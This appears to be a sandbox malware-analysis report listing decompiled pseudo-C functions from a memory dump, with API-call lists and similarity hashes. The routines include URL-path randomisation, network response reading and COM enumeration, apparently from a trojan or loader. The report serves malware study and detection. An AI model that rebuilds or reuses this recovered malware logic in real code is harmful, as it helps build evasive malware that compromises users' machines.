                                								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                								if(_t117 >= 0) {
                                									_t129 = _v20;
                                									if(_t129 != 0) {
                                										_v64 = 3;
                                										_v48 = 3;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t129 > 0) {
                                											while(1) {
                                												_t67 = _v24;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t122 = _t122;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                												if(_t117 < 0) {
                                													goto L16;
                                												}
                                												_t69 = _v8;
                                												_t108 =  *0x461a2d4; // 0xdad5a8
                                												_t28 = _t108 + 0x461b0bc; // 0x3050f1ff
                                												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                												if(_t117 >= 0) {
                                													_t74 = _v16;
                                													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                													if(_t117 >= 0 && _v12 != 0) {
                                														_t78 =  *0x461a2d4; // 0xdad5a8
                                														_t33 = _t78 + 0x461b078; // 0x76006f
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t82 = _v16;
                                															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                														}
                                														 *_t86(_v12);
                                													}
                                													_t76 = _v16;
                                													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                												}
                                												_t71 = _v8;
                                												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                							}
                                							 *_t86(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                					}
                                				}
                                				return _t117;
                                 			}

                                APIs
                                • SysAllocString.OLEAUT32(046192B0), ref: 04616CBD
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04616D9F
                                • SysFreeString.OLEAUT32(00000000), ref: 04616DB8
                                • SysFreeString.OLEAUT32(?), ref: 04616DE7
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                 • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                 • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                 • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                 • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: a1ef3bb21bbdf8c2faf199e7f044d10e291b3d292178ecc0a080b5cfa3f1ff51
                                • Instruction ID: a22b884949daab374c5ef261e0eaf187434cd918948ba6b71898f15664504db5
                                • Opcode Fuzzy Hash: a1ef3bb21bbdf8c2faf199e7f044d10e291b3d292178ecc0a080b5cfa3f1ff51
                                • Instruction Fuzzy Hash: 86514D75D00519EFCB00DFA8C4888AEB7B9EF89705B188599E915AB325E771AD01CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E04615D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v156;
                                				void _v428;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E046128F1(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E04611000(_t79,  &_v428);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04613915(_t101,  &_v428, _a8, _t96 - _t81);
                                					E04613915(_t79,  &_v156, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                					_t66 = E04611000(_t101, 0x461a188);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E04611000(_a16, _a4);
                                						E04613B6F(_t79,  &_v428, _a4, _t97);
                                						memset( &_v428, 0, 0x10c);
                                						_t55 = memset( &_v156, 0, 0x84);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L04617D8C();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L04617D86();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                						_a12 = _t74;
                                						_t76 = E0461679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v156;
                                							if(E04615AC5(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E04614A54(_t79,  &_v156, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(0x461a188 + _a8 * 4) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}






















                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04615E46
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04615E5C
                                • memset.NTDLL ref: 04615F05
                                • memset.NTDLL ref: 04615F1B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 83a40d4125a26c50bc35f53a47ca39633ef7d9ea3a0fd50ed58fe4132194735b
                                • Instruction ID: 62645211a564c789ed3cbcab4b9502719f5f8fc27f4b9368d85593c87c96f882
                                • Opcode Fuzzy Hash: 83a40d4125a26c50bc35f53a47ca39633ef7d9ea3a0fd50ed58fe4132194735b
                                • Instruction Fuzzy Hash: 8F41A531A00219BFEB10DE68DC80BDEB775EF85354F184569B906972A0FB70BE448B44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 66%
                                			E046114A8(void* __eax) {
                                				long _v8;
                                				char _v12;
                                				char _v16;
                                				intOrPtr _v20;
                                				void* _v24;
                                				void* __esi;
                                				void* _t41;
                                				char* _t42;
                                				long _t43;
                                				char* _t45;
                                				intOrPtr _t46;
                                				intOrPtr* _t47;
                                				char _t49;
                                				char* _t54;
                                				long _t55;
                                				intOrPtr* _t56;
                                				void* _t59;
                                				void* _t60;
                                				void* _t67;
                                				void* _t71;
                                				void* _t72;
                                				void* _t73;
                                				void* _t77;
                                
                                				_t71 = __eax;
                                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                					L2:
                                					_t41 = _t71;
                                					_pop(_t72);
                                					_t73 = _t41;
                                					_t42 =  &_v12;
                                					_v8 = 0;
                                					_v16 = 0;
                                					__imp__( *((intOrPtr*)(_t73 + 0x18)), _t42, _t67, _t72, _t60, _t77);
                                					if(_t42 == 0) {
                                						_t43 = GetLastError();
                                						_v8 = _t43;
                                						if(_t43 == 0x2efe) {
                                							_v8 = 0;
                                							goto L29;
                                						}
                                					} else {
                                						if(_v12 == 0) {
                                							L29:
                                							 *((intOrPtr*)(_t73 + 0x30)) = 0;
                                						} else {
                                							_t45 =  &_v24;
                                							_push(_t45);
                                							_push(1);
                                							_push(0);
                                							E0461A144();
                                							if(_t45 != 0) {
                                								_v8 = 8;
                                							} else {
                                								_t46 = E04616837(0x1000);
                                								_v20 = _t46;
                                								if(_t46 == 0) {
                                									_v8 = 8;
                                								} else {
                                									goto L8;
                                									do {
                                										while(1) {
                                											L8:
                                											_t49 = _v12;
                                											if(_t49 >= 0x1000) {
                                												_t49 = 0x1000;
                                											}
                                											__imp__( *((intOrPtr*)(_t73 + 0x18)), _v20, _t49,  &_v16);
                                											if(_t49 == 0) {
                                												break;
                                											}
                                											_t56 = _v24;
                                											 *((intOrPtr*)( *_t56 + 0x10))(_t56, _v20, _v16, 0);
                                											_t18 =  &_v12;
                                											 *_t18 = _v12 - _v16;
                                											if( *_t18 != 0) {
                                												continue;
                                											} else {
                                											}
                                											L14:
                                											if(WaitForSingleObject( *0x461a2c4, 0) != 0x102) {
                                												_v8 = 0x102;
                                											} else {
                                												_t54 =  &_v12;
                                												__imp__( *((intOrPtr*)(_t73 + 0x18)), _t54);
                                												if(_t54 != 0) {
                                													goto L19;
                                												} else {
                                													_t55 = GetLastError();
                                													_v8 = _t55;
                                													if(_t55 == 0x2f78 && _v12 == 0) {
                                														_v8 = 0;
                                														goto L19;
                                													}
                                												}
                                											}
                                											L22:
                                											E046150CA(_v20);
                                											if(_v8 == 0) {
                                												_v8 = E046137FC(_v24, _t73);
                                											}
                                											goto L25;
                                										}
                                										_v8 = GetLastError();
                                										goto L14;
                                										L19:
                                									} while (_v12 != 0);
                                									goto L22;
                                								}
                                								L25:
                                								_t47 = _v24;
                                								 *((intOrPtr*)( *_t47 + 8))(_t47);
                                							}
                                						}
                                					}
                                					return _v8;
                                				} else {
                                					_t59 = E046125C7(__eax);
                                					if(_t59 != 0) {
                                						return _t59;
                                					} else {
                                						goto L2;
                                					}
                                				}
                                			}



























                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,04617134,00000000,?), ref: 04615B9B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04617134,00000000,?,?), ref: 04615BBB
                                  • Part of subcall function 046125C7: wcstombs.NTDLL ref: 04612687
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ErrorLastObjectSingleWaitwcstombs
                                • String ID:
                                • API String ID: 2344289193-0
                                • Opcode ID: 36831479f8b033067a16d0222591de89303a72d69708f10c2887bc80ddf6e07f
                                • Instruction ID: ead89b90efae0d10babd648ec5a53c805c612bde855bb1ab966ceb0d36c18b38
                                • Opcode Fuzzy Hash: 36831479f8b033067a16d0222591de89303a72d69708f10c2887bc80ddf6e07f
                                • Instruction Fuzzy Hash: 83413CB4A00209FFDF10DFA5C9949ADF7B8EB44345F1844AEE502E2260F734AE44DB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E046152E5(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0x461a290, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0x461a2a8; // 0xc9377106
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0x461a2a8 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}


















                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046162E0,00000000,?,00000000,046170D9,00000000,053C9630), ref: 046152F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04615308
                                • memcpy.NTDLL(00000000,053C9630,-00000008,?,?,?,046162E0,00000000,?,00000000,046170D9,00000000,053C9630), ref: 0461534C
                                • memcpy.NTDLL(00000001,053C9630,00000001,046170D9,00000000,053C9630), ref: 0461536D
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 21a3b62edb3b9f810899702ec7ec99bc3a773527c1081cb9864386418a6e796f
                                • Instruction ID: 551972dafe7ba13f3ab9e05e37ccd82280fe28f4d82ac6c5ac3137aff5a5a521
                                • Opcode Fuzzy Hash: 21a3b62edb3b9f810899702ec7ec99bc3a773527c1081cb9864386418a6e796f
                                • Instruction Fuzzy Hash: 6A110A72A00114BFD710CB69DC84D5EBBBEDB90350B0D016AF40597260F6B59E04C790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 53%
                                			E0461578C(char* __eax) {
                                				char* _t8;
                                				intOrPtr _t12;
                                				char* _t21;
                                				signed int _t23;
                                				char* _t24;
                                				signed int _t26;
                                				void* _t27;
                                
                                				_t21 = __eax;
                                				_push(0x20);
                                				_t23 = 1;
                                				_push(__eax);
                                				while(1) {
                                					_t8 = StrChrA();
                                					if(_t8 == 0) {
                                						break;
                                					}
                                					_t23 = _t23 + 1;
                                					_push(0x20);
                                					_push( &(_t8[1]));
                                				}
                                				_t12 = E04616837(_t23 << 2);
                                				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                				if(_t12 != 0) {
                                					StrTrimA(_t21, 0x46192a4);
                                					_t26 = 0;
                                					do {
                                						_t24 = StrChrA(_t21, 0x20);
                                						if(_t24 != 0) {
                                							 *_t24 = 0;
                                							_t24 =  &(_t24[1]);
                                							StrTrimA(_t24, 0x46192a4);
                                						}
                                						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                						_t26 = _t26 + 1;
                                						_t21 = _t24;
                                					} while (_t24 != 0);
                                					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                				}
                                				return 0;
                                			}











                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,053C962C,?,?,?,04611128,053C962C,?,?,046155D3), ref: 046157A6
                                • StrTrimA.SHLWAPI(?,046192A4,00000002,?,?,?,04611128,053C962C,?,?,046155D3), ref: 046157C5
                                • StrChrA.SHLWAPI(?,00000020,?,?,?,04611128,053C962C,?,?,046155D3,?,?,?,?,?,04616BD8), ref: 046157D0
                                • StrTrimA.SHLWAPI(00000001,046192A4,?,?,?,04611128,053C962C,?,?,046155D3,?,?,?,?,?,04616BD8), ref: 046157E2
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 9fb47bd645cc7b45f884de3c4af2c107dd677358fb88043f9432a5f3dc56b066
                                • Instruction ID: 2a4e3f1ab9fead06390ed8bbf4a3442c1988f0cd99a959ae338ad314f63c69f2
                                • Opcode Fuzzy Hash: 9fb47bd645cc7b45f884de3c4af2c107dd677358fb88043f9432a5f3dc56b066
                                • Instruction Fuzzy Hash: 5201B571605321AFD3208E69DC4AE3BFB98EFD6BA0F190519F842C7360FB64D801C6A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04615076() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x461a2c4; // 0x2fc
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0x461a308; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0x461a2c4; // 0x2fc
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0x461a290; // 0x4fd0000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}









                                APIs
                                • SetEvent.KERNEL32(000002FC,00000001,046156C9), ref: 04615081
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04615090
                                • CloseHandle.KERNEL32(000002FC), ref: 046150B1
                                • HeapDestroy.KERNEL32(04FD0000), ref: 046150C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: b9b3a20e9ad9a95858aca7988be558b759c68c2f166c0fb3818cdb5884bed7fe
                                • Instruction ID: 7122d7eeb1264972ddc4aed2d64abbb9b96620600bfcd90a3db98c67e0e3b89d
                                • Opcode Fuzzy Hash: b9b3a20e9ad9a95858aca7988be558b759c68c2f166c0fb3818cdb5884bed7fe
                                • Instruction Fuzzy Hash: 13F03771B01311ABD7205EB4D94CB5677A8EB54713B0C1155BC05D72B4FB2DEC04C9A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E046110DD(void** __esi) {
                                				char* _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				intOrPtr _t11;
                                				void* _t12;
                                				void** _t14;
                                
                                				_t14 = __esi;
                                				_t4 =  *0x461a37c; // 0x53c9630
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0x461a37c; // 0x53c9630
                                					_t1 = _t6 + 0x58; // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t14;
                                				if(_t8 != 0 && _t8 != 0x461a030) {
                                					HeapFree( *0x461a290, 0, _t8);
                                				}
                                				_t14[1] = E0461578C(_v0, _t14);
                                				_t11 =  *0x461a37c; // 0x53c9630
                                				_t12 = _t11 + 0x40;
                                				__imp__(_t12);
                                				return _t12;
                                			}











                                APIs
                                • RtlEnterCriticalSection.NTDLL(053C95F0), ref: 046110E6
                                • Sleep.KERNEL32(0000000A,?,?,046155D3,?,?,?,?,?,04616BD8,?,00000001), ref: 046110F0
                                • HeapFree.KERNEL32(00000000,00000000,?,?,046155D3,?,?,?,?,?,04616BD8,?,00000001), ref: 04611118
                                • RtlLeaveCriticalSection.NTDLL(053C95F0), ref: 04611134
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 53e7faff618f98261121b67780dc243eca36c08b628956bf1587179915365760
                                • Instruction ID: adb7c6c7216703da868262837487d18a18abce13bfbef0370c1bfc64d7155c71
                                • Opcode Fuzzy Hash: 53e7faff618f98261121b67780dc243eca36c08b628956bf1587179915365760
                                • Instruction Fuzzy Hash: ACF03AB0702250DBE7208FB8D949B5677A4EB19746B0C900AF645C7271F628EC04DB29
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E046150DF() {
                                				void* _v0;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				_t3 =  *0x461a37c; // 0x53c9630
                                				__imp__( &(_t3[0x10]));
                                				while(1) {
                                					_t5 =  *0x461a37c; // 0x53c9630
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t7 =  *0x461a37c; // 0x53c9630
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x461b83e) {
                                					HeapFree( *0x461a290, 0, _t10);
                                					_t7 =  *0x461a37c; // 0x53c9630
                                				}
                                				 *_t7 = _v0;
                                				_t8 =  &(_t7[0x10]);
                                				__imp__(_t8);
                                				return _t8;
                                			}










                                APIs
                                • RtlEnterCriticalSection.NTDLL(053C95F0), ref: 046150E8
                                • Sleep.KERNEL32(0000000A,?,?,046155D3,?,?,?,?,?,04616BD8,?,00000001), ref: 046150F2
                                • HeapFree.KERNEL32(00000000,?,?,?,046155D3,?,?,?,?,?,04616BD8,?,00000001), ref: 04615120
                                • RtlLeaveCriticalSection.NTDLL(053C95F0), ref: 04615135
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: de659bcd4db5a45b9f5af8e28edfd020e45ff7d2e86af8af5c9f367310c62d35
                                • Instruction ID: b6b8c09a511feeb061a6bf1113fb861247556a0bf0b2fa371ae991be9784c657
                                • Opcode Fuzzy Hash: de659bcd4db5a45b9f5af8e28edfd020e45ff7d2e86af8af5c9f367310c62d35
                                • Instruction Fuzzy Hash: 74F0D4B4601200EBE718DFA4E869B2577A4EB59B06B0D501AE906D7370F738EC04DA25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E04613D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E04616837(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E04616837(_t28);
                                					if(_t30 == 0) {
                                						E046150CA(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E046177DD(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E046177DD(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}















                                APIs
                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04613CEE,00000000,00000000,00000000,053C9698,?,?,0461106E,?,053C9698), ref: 04613DA4
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                  • Part of subcall function 046177DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04613DD2,00000000,00000001,00000001,?,?,04613CEE,00000000,00000000,00000000,053C9698), ref: 046177EB
                                  • Part of subcall function 046177DD: StrChrA.SHLWAPI(?,0000003F,?,?,04613CEE,00000000,00000000,00000000,053C9698,?,?,0461106E,?,053C9698,0000EA60,?), ref: 046177F5
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04613CEE,00000000,00000000,00000000,053C9698,?,?,0461106E), ref: 04613E02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04613E12
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04613E1E
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 1c074ca70222f56d7914e037075de6066754d9460acd5102e1c78c4309844262
                                • Instruction ID: 37ed31e47f9bb96006e006922b31aa92a317ba81e95b44705cbf09d56fd657ff
                                • Opcode Fuzzy Hash: 1c074ca70222f56d7914e037075de6066754d9460acd5102e1c78c4309844262
                                • Instruction Fuzzy Hash: 9821A571500255ABEB129F74C894AAA7FB8DF16344F0C405AFC059B321F735E981C7A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04615D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E04616837(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}









                                APIs
